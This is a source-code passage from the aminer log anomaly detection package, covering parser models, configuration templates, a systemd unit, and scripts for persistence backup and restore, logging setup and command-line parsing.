DecimalIntegerValueModelElement("rpkts"), FixedDataModelElement("s13", b" BYTES="), DecimalIntegerValueModelElement("rbytes"), # No additional whitespace from Ubuntu Trusty 14.04 on. OptionalMatchModelElement("tail", FixedDataModelElement("s0", b" ")) ]), FixedDataModelElement("nfct-plugin", b"NFCT plugin working in event mode"), FixedDataModelElement("reopen", b"reopening capture file"), FixedDataModelElement("signal", b"signal received, calling pluginstances"), FixedDataModelElement("uidchange", b"Changing UID / GID"), SequenceModelElement("seq", [ FixedDataModelElement("s0", b"id=\""), DecimalIntegerValueModelElement("id"), FixedDataModelElement("s1", b"\" severity=\""), DelimitedDataModelElement("severity", b"\""), FixedDataModelElement("s2", b"\" sys=\""), DelimitedDataModelElement("sys", b"\""), FixedDataModelElement("s3", b"\" sub=\""), DelimitedDataModelElement("sub", b"\""), FixedDataModelElement("s4", b"\" name=\""), DelimitedDataModelElement("name", b"\""), FixedDataModelElement("s5", b"\" action=\""), DelimitedDataModelElement("action", b"\""), FixedDataModelElement("s6", b"\" fwrule=\""), DelimitedDataModelElement("fwrule", b"\""), FixedDataModelElement("s7", b"\" initf=\""), DelimitedDataModelElement("initf", b"\""), FixedDataModelElement("s8", b"\" srcmac=\""), DelimitedDataModelElement("srcmac", b"\""), FixedDataModelElement("s9", b"\" dstmac=\""), DelimitedDataModelElement("dstmac", b"\""), FixedDataModelElement("s10", b"\" srcip=\""), DelimitedDataModelElement("srcip", b"\""), FixedDataModelElement("s11", b"\" dstip=\""), DelimitedDataModelElement("dstip", b"\""), FixedDataModelElement("s12", b"\" proto=\""), DelimitedDataModelElement("proto", b"\""), FixedDataModelElement("s13", b"\" length=\""), DelimitedDataModelElement("length", b"\""), FixedDataModelElement("s14", b"\" tos=\""), DelimitedDataModelElement("tos", b"\""), FixedDataModelElement("s15", b"\" prec=\""), DelimitedDataModelElement("prec", b"\""), FixedDataModelElement("s16", b"\" 
ttl=\""), DelimitedDataModelElement("ttl", b"\""), FixedDataModelElement("s17", b"\" srcport=\""), DelimitedDataModelElement("srcport", b"\""), FixedDataModelElement("s18", b"\" dstport=\""), DelimitedDataModelElement("dstport", b"\""), FixedDataModelElement("s19", b"\" tcpflags=\""), DelimitedDataModelElement("tcpflags", b"\""), FixedDataModelElement("s20", b"\"") ]) ] # Netflow entry model = SequenceModelElement("ulogd", [ FixedDataModelElement("sname", b"ulogd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: "), FirstMatchModelElement("msg", type_children) ]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-enabled/000077500000000000000000000000001500476301700245335ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-enabled/Readme.txt000066400000000000000000000007121500476301700264710ustar00rootroot00000000000000This directory contains files enabled to be included in the analysis pipeline configuration. The files are made available by including this directory within the site packages. If you have objections enabling all the python site packages stored on this host within a process running with elevated privileges, you can also include only some site package components by placing symlinks here, e.g. ln -s /usr/lib/python3.6/dist-packages/pytz conf-enabled/pytz logdata-anomaly-miner-2.8.0/source/root/etc/aminer/template_config.py000066400000000000000000000112631500476301700257330ustar00rootroot00000000000000# This is a template for the "aminer" logdata-anomaly-miner tool. Copy # it to "config.py" and define your ruleset. For more examples of component # usage see aecid-testsuite/demo/aminer/demo-config.py. # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However, if they exist, they have # to be readable by the aminer process! 
Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties = {'LogResourceList': ['file:///tmp/syslog'], 'AminerUser': 'aminer', 'AminerGroup': 'aminer'} learn_mode = True # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. # config_properties['Core.PersistenceDir'] = '/var/lib/aminer' # Set the Unix-Domain-Socket for RemoteControl # RemoteControlSocket: '/var/lib/aminer/log/remcontrol.sock' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ # Build the parsing model: from aminer.parsing.SequenceModelElement import SequenceModelElement import ApacheAccessModel apache_access_model = ApacheAccessModel.get_model() parsing_model = SequenceModelElement('model', [apache_access_model]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers # later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) anomaly_event_handlers = [] # Now define the AtomizerFactory using the model. A simple line # based one is usually sufficient. 
from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory( parsing_model, [atom_filter], anomaly_event_handlers, default_timestamp_path_list=['/model/accesslog/time']) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler atom_filter.add_handler(SimpleUnparsedAtomHandler(anomaly_event_handlers), stop_when_handled_flag=True) from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=learn_mode) analysis_context.register_component(new_match_path_detector, component_name=None) atom_filter.add_handler(new_match_path_detector) # Check if status-code changed from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector new_match_path_value_detector = NewMatchPathValueDetector( analysis_context.aminer_config, ["/model/accesslog/status"], anomaly_event_handlers, learn_mode=learn_mode) analysis_context.register_component(new_match_path_value_detector, component_name=None) atom_filter.add_handler(new_match_path_value_detector) # Check if HTTP-Method for a HTTP-Request has changed from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ "/model/accesslog/request", "/model/accesslog/method"], anomaly_event_handlers, learn_mode=learn_mode) analysis_context.register_component(new_match_path_value_combo_detector, component_name=None) atom_filter.add_handler(new_match_path_value_combo_detector) # Check if HTTP-Statuscode for a HTTP-Request has changed new_match_path_value_combo_detector2 = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ "/model/accesslog/request", "/model/accesslog/status"], 
anomaly_event_handlers, learn_mode=learn_mode) analysis_context.register_component(new_match_path_value_combo_detector2, component_name=None) atom_filter.add_handler(new_match_path_value_combo_detector2) # Add stdout stream printing for debugging, tuning. from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler anomaly_event_handlers.append(StreamPrinterEventHandler(analysis_context)) logdata-anomaly-miner-2.8.0/source/root/etc/aminer/template_config.yml000066400000000000000000000113721500476301700261050ustar00rootroot00000000000000# This is a template for the "aminer" logdata-anomaly-miner tool. Copy # it to "config.yml" and define your ruleset. For more examples of component # usage see aecid-testsuite/demo/aminer/demo-config.yml. #LearnMode: false # optional AminerUser: 'aminer' # optional default: aminer AminerGroup: 'aminer' # optional default: aminer LogResourceList: - 'file:///var/log/apache2/access.log' # - 'unix:///var/lib/akafka/aminer.sock' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. # Core.PersistenceDir: '/var/lib/aminer' # Directory for logfiles. Default: /var/lib/aminer/log # Core.LogDir: '/var/lib/aminer/log' # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. # MailAlerting.TargetAddress: 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. # MailAlerting.FromAddress: 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" # MailAlerting.SubjectPrefix: 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. 
Defaults to 0 (any # event can immediately trigger alerting). # MailAlerting.AlertGraceTime: 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. # MailAlerting.EventCollectTime: 10 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. # MailAlerting.MinAlertGap: 600 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. # MailAlerting.MaxAlertGap: 600 # Define how many events should be included in one alert mail # at most. 
This defaults to 1000 # MailAlerting.MaxEventsPerMessage: 1000 # Configure the logline prefix # LogPrefix: '' ######################################################### # #Parser: # - id: 'timeModel' # type: DateTimeModelElement # name: 'time' # args: '%Y-%m-%dT%H:%M:%S.%f' # # - id: 'hostModel' # type: VariableByteDataModelElement # name: 'host' # args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' # # - id: 'reqMethodModel' # type: FixedWordlistDataModelElement # name: 'method' # args: # - 'GET' # - 'POST' # - 'PUT' # - 'HEAD' # - id: 'apacheModel' # type: ApacheAccessModel # name: 'apache' # args: 'apache' # # - id: 'START' # start: True # type: SequenceModelElement # name: 'model' # args: # - timeModel # - hostModel # - reqMethodModel # - apacheModel Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' args: 'apache' - id: 'startModel' start: True type: SequenceModelElement name: 'model' args: - apacheModel Input: multi_source: False # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: "NewMatchPathValueDetector" paths: ["/model/accesslog/status"] persistence_id: 'accesslog_status' # optional default: Default output_logline: false learn_mode: true - type: "NewMatchPathValueComboDetector" paths: ["/model/accesslog/request","/model/accesslog/method"] learn_mode: true persistence_id: 'accesslog_request' # optional default: Default output_logline: false allow_missing_values: false # optional default: false - type: "NewMatchPathValueComboDetector" paths: ["/model/accesslog/request","/model/accesslog/status"] learn_mode: true EventHandlers: - id: "stpe" json: true # optional default: false type: "StreamPrinterEventHandler" - id: "syslog" type: "SyslogWriterEventHandler" 
logdata-anomaly-miner-2.8.0/source/root/lib/000077500000000000000000000000001500476301700207365ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/lib/systemd/000077500000000000000000000000001500476301700224265ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/lib/systemd/system/000077500000000000000000000000001500476301700237525ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/lib/systemd/system/aminer.service000066400000000000000000000012741500476301700266130ustar00rootroot00000000000000[Unit] Description=aminer log data mining server Documentation=man:aminer(1) [Service] Type=simple ExecStartPre=/usr/bin/touch /var/log/aminer.log ExecStartPre=/bin/chown aminer:aminer /var/log/aminer.log ExecStart=/usr/lib/logdata-anomaly-miner/aminer.py --config /etc/aminer/config.yml KillMode=control-group Restart=on-failure # Write everything to /dev/null: if aminer is misconfigured, it # may detect anonamies in its own log data, thus creating a logging # loop. You may prefer logging to journal only, which needs journald # to be reconfigured with "ForwardToSyslog=false". 
StandardOutput=file:/var/log/aminer.log StandardError=file:/var/log/aminer.log [Install] WantedBy=multi-user.target logdata-anomaly-miner-2.8.0/source/root/usr/000077500000000000000000000000001500476301700210015ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/000077500000000000000000000000001500476301700215475ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/000077500000000000000000000000001500476301700257305ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer-persistence.py000077500000000000000000000117441500476301700321110ustar00rootroot00000000000000#!/usr/bin/python3 # -*- coding: utf-8 -*- import sys import os import re import argparse sys.path = sys.path[1:] + ['/usr/lib/logdata-anomaly-miner', '/etc/aminer/conf-enabled'] venv_path = "/usr/lib/logdata-anomaly-miner/.venv/lib" if os.path.exists(venv_path): python_version = os.listdir(venv_path)[0] sys.path += [os.path.join(venv_path, python_version, "site-packages")] from aminer.AminerConfig import load_config, KEY_AMINER_USER, KEY_AMINER_GROUP, KEY_PERSISTENCE_DIR # noqa: E402 from aminer.util.StringUtil import colflame, flame, supports_color # noqa: E402 from aminer.util.PersistenceUtil import clear_persistence, copytree # noqa: E402 from metadata import __version_string__ # noqa: E402 def main(): """Run the aminer-persistence program.""" # Extract program name, but only when sure to contain no problematic characters. program_name = sys.argv[0].split('/')[-1] if (program_name == '.') or (program_name == '..') or (re.match('^[a-zA-Z0-9._-]+$', program_name) is None): print('Invalid program name, check your execution args', file=sys.stderr) sys.exit(1) help_message = 'aminer-persistence\n' if supports_color(): help_message += colflame else: help_message += flame help_message += 'For further information read the man pages running "man aminerRemoteControl".' 
parser = argparse.ArgumentParser(description=help_message, formatter_class=argparse.RawTextHelpFormatter) parser.add_argument('-v', '--version', action='version', version=__version_string__) parser.add_argument('-c', '--config', type=str, help='path to the config-file') parser.add_argument('-l', '--list', action='store_true', help='list all existing backups') parser.add_argument('-b', '--backup', action='store_true', help='create a backup with the current datetime') parser.add_argument('-r', '--restore', type=str, help='restore a persistence backup') parser.add_argument('-u', '--user', type=str, help='set the aminer user. Only used with --restore') parser.add_argument('-g', '--group', type=str, help='set the aminer group. Only used with --restore') parser.add_argument('-p', '--persistence-dir', type=str, help='set the persistence directory. Only used with --restore') args = parser.parse_args() absolute_persistence_path = None config_file_name = args.config rc_response_string = 'Remote execution response: ' if args.list: process = os.popen('/usr/bin/aminerremotecontrol --exec "list_backups(analysis_context)"') # nosec B605 print(process.read().strip('\n').strip(rc_response_string)) if args.backup: process = os.popen('/usr/bin/aminerremotecontrol --exec "create_backup(analysis_context)"') # nosec B605 print(process.read().strip('\n').strip(rc_response_string)) if args.restore is not None: if not args.restore.startswith('/'): print('The restore path must be absolute.', file=sys.stderr) sys.exit(1) absolute_persistence_path = args.restore if '.' in args.user or '/' in args.user: print(f"The aminer user {args.user} must not contain any . or /", file=sys.stderr) sys.exit(1) aminer_user = args.user if '.' in args.group or '/' in args.group: print(f"The aminer group {args.group} must not contain any . 
or /", file=sys.stderr) sys.exit(1) aminer_grp = args.group if not args.persistence_dir.startswith('/'): print('The persistence_dir path must be absolute.', file=sys.stderr) sys.exit(1) persistence_dir = args.persistence_dir if absolute_persistence_path is not None: if config_file_name is not None: aminer_config = load_config(config_file_name) if args.user is None: aminer_user = aminer_config.config_properties[KEY_AMINER_USER] if args.group is None: aminer_grp = aminer_config.config_properties[KEY_AMINER_GROUP] if args.persistence_dir is None: persistence_dir = aminer_config.config_properties[KEY_PERSISTENCE_DIR] else: aminer_user = 'aminer' aminer_grp = 'aminer' persistence_dir = '/var/lib/aminer' if not os.path.exists(absolute_persistence_path): print(f"{absolute_persistence_path} does not exist.", file=sys.stderr) else: from pwd import getpwnam from grp import getgrnam child_user_id = getpwnam(aminer_user).pw_uid child_group_id = getgrnam(aminer_grp).gr_gid clear_persistence(persistence_dir) copytree(absolute_persistence_path, persistence_dir) for dirpath, _dirnames, filenames in os.walk(persistence_dir): os.chown(dirpath, child_user_id, child_group_id) for filename in filenames: os.chown(os.path.join(dirpath, filename), child_user_id, child_group_id) print(f"Restored persistence from {absolute_persistence_path} successfully.") main() logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer.py000077500000000000000000001210241500476301700275600ustar00rootroot00000000000000#!/usr/bin/python3 # -*- coding: utf-8 -*- """This is the main program of the "aminer" logfile miner tool. It does not import any local default site packages to decrease the attack surface due to manipulation of unused but available packages. CAVEAT: This process will keep running with current permissions, no matter what was specified in 'AminerUser' and 'AminerGroup' configuration properties. 
This is required to allow the aminer parent process to reopen log files, which might need the elevated privileges. NOTE: This tool is developed to allow secure operation even in hostile environment, e.g. when one directory, where aminer attempts to open logfiles is already under full control of an attacker. However, it is not intended to be run as SUID-binary, this would require code changes to protect also against standard SUID attacks. Parameters: * --config [file]: Location of configuration file, defaults to '/etc/aminer/config.py' when not set. * --run-analysis: This parameters is NOT intended to be used on command line when starting aminer, it will trigger execution of the unprivileged aminer background child performing the real analysis. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import errno import os import re import socket import time import sys import logging import shutil import warnings import argparse import stat import tempfile import ast from pwd import getpwnam from grp import getgrnam from logging.handlers import RotatingFileHandler # As site packages are not included, define from where we need to execute code before loading it. 
sys.path = sys.path[1:] + ["/usr/lib/logdata-anomaly-miner", "/etc/aminer/conf-enabled"] venv_path = "/usr/lib/logdata-anomaly-miner/.venv/lib" if os.path.exists(venv_path): python_version = os.listdir(venv_path)[0] sys.path += [os.path.join(venv_path, python_version, "site-packages")] import aminer.AminerConfig as AminerConfig # noqa: E402 from aminer.util.StringUtil import colflame, flame, supports_color, decode_string_as_byte_string # noqa: E402 from aminer.util.PersistenceUtil import clear_persistence, copytree # noqa: E402 from aminer.util import SecureOSFunctions # noqa: E402 from aminer.AnalysisChild import AnalysisChild # noqa: E402 from aminer.input.LogStream import FileLogDataResource, UnixSocketLogDataResource # noqa: E402 from metadata import __version_string__, __version__ # noqa: E402 child_termination_triggered_flag = False offline_mode = False def run_analysis_child(aminer_config, program_name): """Run the Analysis Child.""" # Verify existence and ownership of persistence directory. logging.getLogger(AminerConfig.REMOTE_CONTROL_LOG_NAME).info('aminer started.') logging.getLogger(AminerConfig.DEBUG_LOG_NAME).info('aminer started.') persistence_dir_name = aminer_config.config_properties.get(AminerConfig.KEY_PERSISTENCE_DIR, AminerConfig.DEFAULT_PERSISTENCE_DIR) persistence_dir_fd = SecureOSFunctions.secure_open_base_directory(persistence_dir_name, os.O_RDONLY | os.O_DIRECTORY | os.O_PATH) stat_result = os.fstat(persistence_dir_fd) if ((not stat.S_ISDIR(stat_result.st_mode)) or ((stat_result.st_mode & stat.S_IRWXU) != 0o700) or ( stat_result.st_uid != os.getuid()) or (stat_result.st_gid != os.getgid())): msg = f"FATAL: persistence directory \"{repr(persistence_dir_name)}\" has to be owned by analysis process (uid " \ f"{stat_result.st_uid}!={os.getuid()}, gid {stat_result.st_gid}!={os.getgid()}) and have access mode 0700 only!" 
print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).critical(msg) sys.exit(1) import posix1e # O_PATH is problematic when checking ACL. However, it is possible to check the ACL using the file name. try: if posix1e.has_extended(persistence_dir_name): msg = f"WARNING: SECURITY: Extended POSIX ACLs are set in {persistence_dir_name.decode()}, but not supported by the aminer. " \ f"Backdoor access could be possible." print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).warning(msg) except OSError: # system does not support POSIX ACLs. pass child = AnalysisChild(program_name, aminer_config) child.offline_mode = offline_mode # This function call will only return on error or signal induced normal termination. child_return_status = child.run_analysis(3) if child_return_status == 0: sys.exit(0) msg = f"{program_name}: run_analysis terminated with unexpected status {child_return_status}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) def initialize_loggers(aminer_config, aminer_user_id, aminer_grp_id): """Initialize all loggers.""" datefmt = '%d/%b/%Y:%H:%M:%S %z' log_dir = aminer_config.config_properties.get(AminerConfig.KEY_LOG_DIR, AminerConfig.DEFAULT_LOG_DIR) if log_dir == AminerConfig.DEFAULT_LOG_DIR: try: if not os.path.isdir(log_dir): persistence_dir_path = aminer_config.config_properties.get( AminerConfig.KEY_PERSISTENCE_DIR, AminerConfig.DEFAULT_PERSISTENCE_DIR) persistence_dir_fd = SecureOSFunctions.secure_open_base_directory( persistence_dir_path, os.O_RDONLY | os.O_DIRECTORY | os.O_PATH) if SecureOSFunctions.base_dir_path.decode() == AminerConfig.DEFAULT_PERSISTENCE_DIR: relative_path_log_dir = os.path.split(AminerConfig.DEFAULT_LOG_DIR)[1] os.mkdir(relative_path_log_dir, dir_fd=persistence_dir_fd) os.chown(relative_path_log_dir, aminer_user_id, aminer_grp_id, dir_fd=persistence_dir_fd, follow_symlinks=False) except OSError as e: if e.errno != errno.EEXIST: msg = 
'Unable to create log-directory: %s' % log_dir else: msg = e logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg.strip('\n')) print(msg, file=sys.stderr) tmp_value = aminer_config.config_properties.get(AminerConfig.KEY_REMOTE_CONTROL_LOG_FILE) if tmp_value is not None and b'/' in tmp_value: print(f"{AminerConfig.KEY_REMOTE_CONTROL_LOG_FILE} attribute must not contain a full directory path, but only the filename.", file=sys.stderr) sys.exit(1) tmp_value = aminer_config.config_properties.get(AminerConfig.KEY_STAT_LOG_FILE) if tmp_value is not None and b'/' in tmp_value: print(f"{AminerConfig.KEY_STAT_LOG_FILE} attribute must not contain a full directory path, but only the filename.", file=sys.stderr) sys.exit(1) tmp_value = aminer_config.config_properties.get(AminerConfig.KEY_DEBUG_LOG_FILE) if tmp_value is not None and b'/' in tmp_value: print(f"{AminerConfig.KEY_DEBUG_LOG_FILE} attribute must not contain a full directory path, but only the filename.", file=sys.stderr) sys.exit(1) max_bytes = aminer_config.config_properties.get(AminerConfig.KEY_LOG_ROTATION_MAX_BYTES, AminerConfig.DEFAULT_LOG_ROTATION_MAX_BYTES) backup_count = aminer_config.config_properties.get( AminerConfig.KEY_LOG_ROTATION_BACKUP_COUNT, AminerConfig.DEFAULT_LOG_ROTATION_BACKUP_COUNT) log_dir_fd = SecureOSFunctions.secure_open_log_directory(log_dir, os.O_RDONLY | os.O_DIRECTORY | os.O_PATH) rc_logger = logging.getLogger(AminerConfig.REMOTE_CONTROL_LOG_NAME) rc_logger.setLevel(logging.DEBUG) remote_control_log_file = aminer_config.config_properties.get( AminerConfig.KEY_REMOTE_CONTROL_LOG_FILE, os.path.join(log_dir, AminerConfig.DEFAULT_REMOTE_CONTROL_LOG_FILE)) if not remote_control_log_file.startswith(log_dir): remote_control_log_file = os.path.join(log_dir, remote_control_log_file) try: rc_file_handler = RotatingFileHandler(remote_control_log_file, maxBytes=max_bytes, backupCount=backup_count) os.chown(remote_control_log_file, aminer_user_id, aminer_grp_id, dir_fd=log_dir_fd, 
follow_symlinks=False) except OSError as e: print(f"Could not create or open {remote_control_log_file}: {e}. Stopping..", file=sys.stderr) sys.exit(1) rc_file_handler.setFormatter(logging.Formatter(fmt='%(asctime)s %(levelname)s %(message)s', datefmt=datefmt)) rc_logger.addHandler(rc_file_handler) logging.addLevelName(15, "REMOTECONTROL") stat_logger = logging.getLogger(AminerConfig.STAT_LOG_NAME) stat_logger.setLevel(logging.INFO) stat_log_file = aminer_config.config_properties.get( AminerConfig.KEY_STAT_LOG_FILE, os.path.join(log_dir, AminerConfig.DEFAULT_STAT_LOG_FILE)) if not stat_log_file.startswith(log_dir): stat_log_file = os.path.join(log_dir, stat_log_file) try: stat_file_handler = RotatingFileHandler(stat_log_file, maxBytes=max_bytes, backupCount=backup_count) os.chown(stat_log_file, aminer_user_id, aminer_grp_id, dir_fd=log_dir_fd, follow_symlinks=False) except OSError as e: print(f"Could not create or open {stat_log_file}: {e}. Stopping..", file=sys.stderr) sys.exit(1) stat_file_handler.setFormatter(logging.Formatter(fmt='%(asctime)s %(message)s', datefmt=datefmt)) stat_logger.addHandler(stat_file_handler) debug_logger = logging.getLogger(AminerConfig.DEBUG_LOG_NAME) if AminerConfig.DEBUG_LEVEL == 0: debug_logger.setLevel(logging.ERROR) elif AminerConfig.DEBUG_LEVEL == 1: debug_logger.setLevel(logging.INFO) else: debug_logger.setLevel(logging.DEBUG) debug_log_file = aminer_config.config_properties.get( AminerConfig.KEY_DEBUG_LOG_FILE, os.path.join(log_dir, AminerConfig.DEFAULT_DEBUG_LOG_FILE)) if not debug_log_file.startswith(log_dir): debug_log_file = os.path.join(log_dir, debug_log_file) try: debug_file_handler = RotatingFileHandler(debug_log_file, maxBytes=max_bytes, backupCount=backup_count) os.chown(debug_log_file, aminer_user_id, aminer_grp_id, dir_fd=log_dir_fd, follow_symlinks=False) except OSError as e: print(f"Could not create or open {debug_log_file}: {e}. 
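Stopping..", file=sys.stderr) sys.exit(1) debug_file_handler.setFormatter(logging.Formatter(fmt='%(asctime)s %(levelname)s %(message)s', datefmt=datefmt)) debug_logger.addHandler(debug_file_handler)


def parse_var(s):
    """Parse a key, value pair, separated by "=".

    That's the reverse of ShellArgs. On the command line (argparse) a declaration will typically look like:
        foo=hello
    or
        foo="hello world"

    Returns a (key, value) tuple. Blanks around the key are removed; the value is returned verbatim, so it may itself contain "=".
    Raises ValueError when s contains no "=" at all (the previous implementation failed with an UnboundLocalError here).
    """
    key, separator, value = s.partition("=")
    if not separator:
        raise ValueError(f"Expected a KEY=VALUE pair but got {s!r}")
    # We remove blanks around keys, as is logical; the rest of the string after the first "=" is the value.
    return key.strip(), value


def parse_vars(items):
    """Parse a series of "KEY=VALUE" strings and return them as a dictionary.

    A None or empty items argument yields an empty dictionary. A key given twice keeps its last value.
    """
    result = {}
    for item in items or ():
        key, value = parse_var(item)
        result[key] = value
    return result


def _report_error_and_exit(msg, exit_code=1):
    """Print msg to stderr, record it on the debug logger and terminate the current process via sys.exit(exit_code).

    Only meant for the main (parent) process; the forked analysis child below uses os._exit() on purpose so that no
    interpreter cleanup of the parent's state runs twice.
    """
    print(msg, file=sys.stderr)
    logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg)
    sys.exit(exit_code)


def _report_warning(msg):
    """Print msg to stderr and record it on the debug logger at warning level."""
    print(msg, file=sys.stderr)
    logging.getLogger(AminerConfig.DEBUG_LOG_NAME).warning(msg)


def _build_argument_parser():
    """Create the argparse parser with all aminer command line options.

    The help text is prefixed with the colored or plain flame logo depending on terminal capabilities.
    """
    help_message = 'aminer - logdata-anomaly-miner\n'
    if supports_color():
        help_message += colflame
    else:
        help_message += flame
    parser = argparse.ArgumentParser(description=help_message, formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument('-v', '--version', action='version', version=__version_string__)
    parser.add_argument('-u', '--check-updates', action='store_true', help='check if updates for the aminer are available.')
    parser.add_argument('-c', '--config', default='/etc/aminer/config.yml', type=str, help='path to the config-file')
    # Note the inverted flag: args.daemon is True by default (foreground) and becomes False when -D is given.
    parser.add_argument('-D', '--daemon', action='store_false', help='run as a daemon process')
    parser.add_argument('-s', '--stat', choices=["0", "1", "2"], type=str,
                        help='set the stat level. Possible stat-levels are 0 for no statistics, 1 for normal statistic level and 2 for '
                             'verbose statistics.')
    parser.add_argument('-d', '--debug', choices=["0", "1", "2"], type=str,
                        help='set the debug level. Possible debug-levels are 0 for no debugging, 1 for normal output (INFO and above), 2 '
                             'for printing all debug information.')
    parser.add_argument('--run-analysis', action='store_true', help='enable/disable analysis')
    parser.add_argument('-C', '--clear', action='store_true', help='removes all persistence directories')
    parser.add_argument('-r', '--remove', action='append', type=str, help='removes a specific persistence directory')
    parser.add_argument('-R', '--restore', type=str, help='restore a persistence backup')
    parser.add_argument('-f', '--from-begin', action='store_true', help='removes RepositioningData before starting the aminer')
    parser.add_argument('-o', '--offline-mode', action='store_true', help='stop the aminer after all logs have been processed.')
    parser.add_argument("--config-properties", metavar="KEY=VALUE", nargs='+',
                        help="Set a number of config_properties by using key-value pairs (do not put spaces before or after the = sign). "
                             "If a value contains spaces, you should define it with double quotes: 'foo=\"this is a sentence\". Note that "
                             "values are always treated as strings. If values are already defined in the config_properties, the input "
                             "types are converted to the ones already existing.")
    return parser


def _check_for_updates():
    """Compare the installed version with the one published in the project's main branch, print the result and exit.

    Network, TLS and parsing failures are reported on stderr with exit status 1 instead of escaping as a traceback.
    """
    import urllib3
    url = 'https://raw.githubusercontent.com/ait-aecid/logdata-anomaly-miner/main/source/root/usr/lib/logdata-anomaly-miner/metadata.py'
    # Request certificate verification explicitly (older urllib3 releases default to unverified HTTPS) and bound the wait time.
    http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', timeout=10.0)
    try:
        r = http.request('GET', url, preload_content=True)
        metadata = r.data.decode()
    except urllib3.exceptions.HTTPError as e:
        print(f"Could not retrieve version information from {url}: {e}", file=sys.stderr)
        sys.exit(1)
    finally:
        http.clear()
    curr_version = None
    for line in metadata.split('\n'):
        if '__version__ = ' in line:
            curr_version = line.split('__version__ = ')[1].strip('"')
            break
    if curr_version is None:
        # E.g. an HTTP error page was returned; do not report "None" as the latest version.
        print(f"Could not determine the latest aminer version from {url}. Currently version {__version__} is installed.",
              file=sys.stderr)
        sys.exit(1)
    if __version__ == curr_version:
        print(f"The current aminer version {curr_version} is installed.")
    else:
        print(f"A new aminer version exists ({curr_version}). Currently version {__version__} is installed.")
        print("Use git pull to update the aminer version.")
    sys.exit(0)


def _write_temp_config_with_learn_mode(config_file_name, learn_mode):
    """Copy the YAML configuration to a temporary file with every line mentioning "LearnMode" replaced and return its path.

    The caller removes the temporary file again. The substring match on "LearnMode" is kept from the original implementation,
    i.e. any line containing that token is rewritten, not only the top-level key.
    """
    fd, temp_config = tempfile.mkstemp(suffix=".yml")
    try:
        with open(config_file_name) as f:
            for line in f:
                if "LearnMode" in line:
                    # Keep the line terminator, otherwise the following key would be glued onto this line.
                    line = f"LearnMode: {learn_mode}\n"
                os.write(fd, line.encode())
    finally:
        os.close(fd)
    return temp_config


def _convert_config_property(config_property, old_value, value):
    """Coerce a command line override (always a string) to the type of the value already present in the configuration.

    bool accepts only "True"/"False"; int and float are parsed; list values are built with ast.literal_eval, which only
    accepts Python literals (no code execution). Any other existing type keeps the string. Terminates the program on a
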